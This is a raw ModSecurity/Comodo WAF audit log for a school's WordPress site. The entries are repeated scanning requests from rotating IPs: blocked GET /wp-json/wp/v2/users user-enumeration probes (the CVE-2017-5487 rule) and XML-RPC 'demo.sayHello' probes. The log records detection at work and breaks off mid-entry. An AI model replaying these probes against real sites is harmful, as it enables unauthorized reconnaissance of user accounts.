(CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747446955288457 2831 (- - -) Stopwatch2: 1747446955288457 2831; combined=1251, p1=428, p2=792, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d3bb306-Z-- --6ab99129-A-- [17/May/2025:08:56:00 +0700] aCfssATOsBn9MSWb6WJu6AAAAIY 103.236.140.4 44626 103.236.140.4 8181 --6ab99129-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.89.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.89.175 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6ab99129-C-- demo.sayHello --6ab99129-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ab99129-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747446960990544 6426 (- - -) Stopwatch2: 1747446960990544 6426; combined=4654, p1=615, p2=3803, p3=39, p4=42, p5=93, sr=77, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ab99129-Z-- --8b2d765a-A-- [17/May/2025:08:57:46 +0700] aCftGum4kjNN-hEbWjJBYQAAAEQ 103.236.140.4 44656 103.236.140.4 8181 --8b2d765a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.121 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8b2d765a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b2d765a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747447066464160 2847 (- - -) Stopwatch2: 1747447066464160 2847; combined=1358, p1=442, p2=881, p3=0, p4=0, p5=34, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b2d765a-Z-- --3b71bc38-A-- [17/May/2025:08:57:53 +0700] aCftIQTOsBn9MSWb6WJu6gAAAIg 103.236.140.4 44662 103.236.140.4 8181 --3b71bc38-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.182.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.182.121 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3b71bc38-C-- demo.sayHello --3b71bc38-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b71bc38-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747447073120990 4914 (- - -) Stopwatch2: 1747447073120990 4914; combined=3741, p1=479, p2=3060, p3=24, p4=25, p5=90, sr=89, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b71bc38-Z-- --6f5da736-A-- [17/May/2025:08:58:48 +0700] aCftWHyxdQCiyU1ENFcoDQAAABY 103.236.140.4 44670 103.236.140.4 8181 --6f5da736-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.9 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6f5da736-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f5da736-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747447128601056 2949 (- - -) Stopwatch2: 1747447128601056 2949; combined=1331, p1=458, p2=841, p3=0, p4=0, p5=31, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f5da736-Z-- --377bf930-A-- [17/May/2025:08:58:55 +0700] aCftX-m4kjNN-hEbWjJBZAAAAEs 103.236.140.4 44674 103.236.140.4 8181 --377bf930-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.9 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.9 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --377bf930-C-- demo.sayHello --377bf930-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --377bf930-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747447135447741 5630 (- - -) Stopwatch2: 1747447135447741 5630; combined=4125, p1=564, p2=3338, p3=32, p4=35, p5=92, sr=81, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --377bf930-Z-- --70977b50-A-- [17/May/2025:08:59:25 +0700] aCftfem4kjNN-hEbWjJBZgAAAE0 103.236.140.4 44680 103.236.140.4 8181 --70977b50-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.220 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.220 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --70977b50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70977b50-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747447165886428 3438 (- - -) Stopwatch2: 1747447165886428 3438; combined=1495, p1=485, p2=976, p3=0, p4=0, p5=34, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70977b50-Z-- --51366b65-A-- [17/May/2025:08:59:37 +0700] aCftiem4kjNN-hEbWjJBagAAAFM 103.236.140.4 44690 103.236.140.4 8181 --51366b65-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.220 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.220 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --51366b65-C-- demo.sayHello --51366b65-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --51366b65-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747447177874577 6541 (- - -) Stopwatch2: 1747447177874577 6541; combined=4815, p1=623, p2=3967, p3=37, p4=41, p5=89, sr=78, sw=58, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --51366b65-Z-- --64e1512b-A-- [17/May/2025:08:59:49 +0700] aCftlQTOsBn9MSWb6WJu7QAAAIo 103.236.140.4 44694 103.236.140.4 8181 --64e1512b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --64e1512b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --64e1512b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747447189856516 3251 (- - -) Stopwatch2: 1747447189856516 3251; combined=1406, p1=482, p2=893, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64e1512b-Z-- --18857274-A-- [17/May/2025:08:59:55 +0700] aCftm3yxdQCiyU1ENFcoDwAAAAE 103.236.140.4 44698 103.236.140.4 8181 --18857274-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.222 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --18857274-C-- demo.sayHello --18857274-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --18857274-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747447195739497 5739 (- - -) Stopwatch2: 1747447195739497 5739; combined=4232, p1=545, p2=3463, p3=32, p4=36, p5=92, sr=77, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18857274-Z-- --63377234-A-- [17/May/2025:09:00:48 +0700] aCft0ATOsBn9MSWb6WJu7wAAAJE 103.236.140.4 44712 103.236.140.4 8181 --63377234-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.73 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.73 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --63377234-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63377234-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747447248929780 3292 (- - -) Stopwatch2: 1747447248929780 3292; combined=1479, p1=495, p2=952, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63377234-Z-- --37519133-A-- [17/May/2025:09:00:59 +0700] aCft2wTOsBn9MSWb6WJu8QAAAJQ 103.236.140.4 44716 103.236.140.4 8181 --37519133-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.96.73 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.96.73 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --37519133-C-- demo.sayHello --37519133-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --37519133-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747447259857232 5495 (- - -) Stopwatch2: 1747447259857232 5495; combined=4064, p1=521, p2=3311, p3=40, p4=34, p5=94, sr=74, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37519133-Z-- --d151e660-A-- [17/May/2025:09:08:56 +0700] aCfvuOm4kjNN-hEbWjJBkwAAAFQ 103.236.140.4 44894 103.236.140.4 8181 --d151e660-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d151e660-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d151e660-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747447736327883 2989 (- - -) Stopwatch2: 1747447736327883 2989; combined=1224, p1=447, p2=747, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d151e660-Z-- --28aa8000-A-- [17/May/2025:09:09:01 +0700] aCfvvQTOsBn9MSWb6WJu-AAAAIU 103.236.140.4 44900 103.236.140.4 8181 --28aa8000-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.2 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --28aa8000-C-- demo.sayHello --28aa8000-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --28aa8000-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747447741047554 4710 (- - -) Stopwatch2: 1747447741047554 4710; combined=3510, p1=415, p2=2876, p3=29, p4=34, p5=92, sr=54, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28aa8000-Z-- --6fb75622-A-- [17/May/2025:09:14:36 +0700] aCfxDHyxdQCiyU1ENFcobQAAABY 103.236.140.4 45096 103.236.140.4 8181 --6fb75622-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.121 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6fb75622-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fb75622-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747448076685050 3291 (- - -) Stopwatch2: 1747448076685050 3291; combined=1443, p1=514, p2=897, p3=0, p4=0, p5=32, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fb75622-Z-- --50b8404e-A-- [17/May/2025:09:14:42 +0700] aCfxEnyxdQCiyU1ENFcobwAAAAE 103.236.140.4 45100 103.236.140.4 8181 --50b8404e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.121 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --50b8404e-C-- demo.sayHello --50b8404e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --50b8404e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747448082555499 4659 (- - -) Stopwatch2: 1747448082555499 4659; combined=3671, p1=442, p2=2997, p3=24, p4=24, p5=105, sr=68, sw=79, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50b8404e-Z-- --be0d6a46-A-- [17/May/2025:09:14:57 +0700] aCfxIXyxdQCiyU1ENFcocQAAAAM 103.236.140.4 45104 103.236.140.4 8181 --be0d6a46-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.105.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.105.192 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --be0d6a46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be0d6a46-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747448097561187 2834 (- - -) Stopwatch2: 1747448097561187 2834; combined=1235, p1=427, p2=778, p3=0, p4=0, p5=29, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be0d6a46-Z-- --68fc2304-A-- [17/May/2025:09:15:03 +0700] aCfxJ-m4kjNN-hEbWjJBpgAAAEM 103.236.140.4 45108 103.236.140.4 8181 --68fc2304-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.105.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.105.192 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --68fc2304-C-- demo.sayHello --68fc2304-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --68fc2304-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" 